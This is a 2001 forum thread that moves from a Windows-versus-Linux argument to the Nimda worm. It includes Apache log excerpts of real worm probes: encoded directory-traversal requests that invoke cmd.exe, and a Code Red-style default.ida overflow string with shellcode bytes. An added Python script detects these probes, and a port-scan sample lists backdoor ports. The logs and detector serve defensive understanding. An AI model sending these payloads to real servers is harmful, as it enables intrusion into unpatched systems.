Virus Alert

Wij

Guest
Originally posted by testin_da_cable
lol :) very true Trebz :D


Jas if you think windows is fine, then by all means keep using it matey. I obviously don't think it's fine so I chose to start using linux [about 3 years ago] and didn't look back. Now I use it exclusively.

How do you play Age of Kings or Max Payne etc... etc... ?
 
Testin da Cable

Guest
simple: I don't.
though I may in the future if they get ported. in fact, I believe an AoK port is under way.

well, to let you in on a little secret I've got a win98se install on an unused partition. I played MaxPayne with much enjoyment, and I'm going to buy MythIII:exile. Myth is so beautiful it would be worth running w98 just to play.
Still, there's a little something called 'win4lin' [wine is another option] that's capable of running msoffice under linux. If it can do that, it may well be able to run Myth. Going to try at least heh :)
 
Wij

Guest
I doubt it will run games well :)

My PC is for games and surfing for erm... things of interest... um, yes.

So I'm happy with Windows :)
 
Testin da Cable

Guest
I'm not too sure either :(
Still, I can live with playing a game on windows.
 
~Lazarus~

Guest
and.... ermm.... wtf has this to do with the virus ?
 
granny

Guest
Look, some people do things that mean linux is simply not feasible for them - I *have* to use M$ Office apps, I play games (LOTS of games not just the 0.02% of them that also happen to be ported to linux), I use things like 3dsmax etc etc. Now someone could easily pop up and say "use staroffice, play q3, use blender & gimp" which is fine but I DON'T WANT TO USE THOSE THINGS, I NEED TO USE THE OTHER APPS. Therefore for me, and other people with similar needs (note I say NEEDS not wants) linux is pointless, so stop fucking trying to sell it to us ok?

For other people who have the luxury of not having to use such proprietary file formats and apps then yes, linux may well be fantastic and a far better, more stable and secure and less buggy solution than windows in any form. Fine, I'm happy for you, good luck to you, but stop fucking evangelising about your fucking choice of OS, we really could care less.

And as for all the stuff about microsoft profiteering and bullying tactics, well, go fuck yourselves, I'm sorry, this *is* capitalism we live under, that's an inherent part of it, and no, I'm not justifying it, I agree that it's wrong it's just that I think the only way to do anything about it is to stop fucking whinging and get off your arse and fight for an alternative. If you're not willing to do that then I repeat my earlier request for you to shut the fuck up and fuck the cunt off.

*ahem*

Soz for the rant, one of those days.... funnily enough one of those days that included 2 hours of trying to remove W32.Nimda.a from several machines here :p
 
Will

Guest
Originally posted by granny
...so stop fucking trying to sell it to us ok?

...I think the only way to do anything about it is to stop fucking whinging and get off your arse and fight for an alternative.
Sorry to so blatantly wind you up after a rant like that, but I couldn't resist it. :p
 
Testin da Cable

Guest
Grans, if you don't want to hear my answer then don't ask me a question ok?*






*not just you tho, I'm speaking generally heh
**dun worry, I have those kinda days too ;)
***don't swear so much, it's not good for you
****nobody _has_ to do anything, it's all choice
 
old.Jas

Guest
Granny : you deserve a reward for that fine rant
 
DAN200

Guest
For me Friday is the day of good stuff on Telly, nothing more...
 
Testin da Cable

Guest
good god

I slapped up Apache [webserver] this morning to try summat while at workies.
Looking through the logs after I got home, I find I've been scanned by "nimda" infected pc's about a zillion times in the ~15 hrs the server has been up. Nothing doing heh as Apache has no idea what the worm wants and just logs an error. Rather large logfile tho. I'll post a bit of it so you guys can see what happens when the worm scans a webserver....

/me goes off to get a choice bit 'o log ;)
 
Summo

Guest
Hurry!



My little ZoneAlarm log is showing 94 attempts at access to my PC in the few hours I've been online since getting back from work. I'd normally expect 5-10 in that time.
 
Testin da Cable

Guest
goes a little something like this:

213.11.168.2 - - [21/Sep/2001:13:05:17 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210
213.11.168.2 - - [21/Sep/2001:13:05:18 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208
213.11.168.2 - - [21/Sep/2001:13:05:18 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
213.11.168.2 - - [21/Sep/2001:13:05:18 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218
213.11.168.2 - - [21/Sep/2001:13:05:18 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
213.11.168.2 - - [21/Sep/2001:13:05:19 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
213.11.168.2 - - [21/Sep/2001:13:05:19 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 249
213.11.168.2 - - [21/Sep/2001:13:05:19 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 265
213.11.168.2 - - [21/Sep/2001:13:05:20 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
213.11.168.2 - - [21/Sep/2001:13:05:20 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
213.11.168.2 - - [21/Sep/2001:13:05:20 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
213.11.168.2 - - [21/Sep/2001:13:05:24 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231
213.11.168.2 - - [21/Sep/2001:13:05:24 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
213.11.168.2 - - [21/Sep/2001:13:05:24 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215
213.11.168.2 - - [21/Sep/2001:13:05:25 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232
213.11.168.2 - - [21/Sep/2001:13:05:25 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 23

what you're reading is a request from that IP number attempting to force my webserver to execute some commands.
[which it won't...but even if it were forced to try somehow it wouldn't be able to anyway heh]
 
Testin da Cable

Guest
I also get this [several different IP's] every 4 mins or so:

213.46.140.36 - - [21/Sep/2001:13:30:04 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 205

heh nice fingerprint =P
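
An added example, not part of the original posts: a small Python triage of Apache access-log lines like the two excerpts above, tagging the encoded-traversal `cmd.exe`/`root.exe` probes and the padded `default.ida` request per source address. The function names, tag names and sample lines (documentation-range addresses) are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')
OVERLONG_RE = re.compile(r'%c[01]', re.I)        # 0xC0/0xC1 never occur in valid UTF-8
IDA_RE = re.compile(r'\.ida\?(.)\1{99,}', re.I)  # 100+ repeats of one padding character

def decode_fully(target, max_rounds=4):
    """Percent-decode until stable; return (decoded, rounds that changed the text)."""
    rounds = 0
    while rounds < max_rounds and (nxt := unquote(target, encoding="latin-1")) != target:
        target, rounds = nxt, rounds + 1
    return target, rounds

def classify(target):
    """Return the set of probe tags that apply to one request target."""
    decoded, rounds = decode_fully(target)
    low = decoded.lower()
    checks = {
        "double_encoded": rounds >= 2,                   # %255c -> %5c -> backslash
        "overlong_utf8": bool(OVERLONG_RE.search(target)),  # %c0%af in place of "/"
        "traversal": "../" in low or "..\\" in low,
        "shell_probe": "cmd.exe" in low or "root.exe" in low,
        "ida_padding": bool(IDA_RE.search(target)),
    }
    return {tag for tag, hit in checks.items() if hit}

def scan(lines):
    """Map each source address to a Counter of tags; untagged requests are skipped."""
    hits = {}
    for m in filter(None, map(LOG_RE.match, lines)):
        tags = classify(m.group(3))
        if tags:
            hits.setdefault(m.group(1), Counter()).update(tags)
    return hits

# Constructed sample lines in the same log format as the excerpts above.
TS = "[21/Sep/2001:13:05:17 +0200]"
SAMPLE = [
    f'192.0.2.10 - - {TS} "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210',
    f'192.0.2.10 - - {TS} "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232',
    f'192.0.2.10 - - {TS} "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231',
    f'192.0.2.10 - - {TS} "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215',
    f'198.51.100.7 - - {TS} "GET /default.ida?{"X" * 224}%u9090%u6858=a HTTP/1.0" 404 205',
    f'203.0.113.5 - - {TS} "GET /index.html HTTP/1.0" 200 1024',
]
```

Calling `scan(SAMPLE)` groups the tags by source address, so one noisy scanner collapses to a single entry instead of sixteen log lines.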
 
Testin da Cable

Guest
k, I'll be extra nice for a sec...
if you're feeling a bit wonky about your OS right now...like you forgot to turn on that 'ole firewall & virus scanner or something...
pm me your IP and I'll scan your ports for evilness.
be aware: a portscan won't tell you if you've got a 'nimda' infestation [or anything else that doesn't bind to a port] -you need a good virusscanner for that, but it will tell you if you've got one of these beasties [example]:
Code:
12345/tcp  open        NetBus                  
12346/tcp  open        NetBus                  
31337/tcp  open        Elite

on the other hand, you can get yourself scanned any number of ways, for instance by a nice man called Steve over at grc.com. that is, if he hasn't been ddos'd off the face of the planet by skript kiddiots again :rolleyes:
 
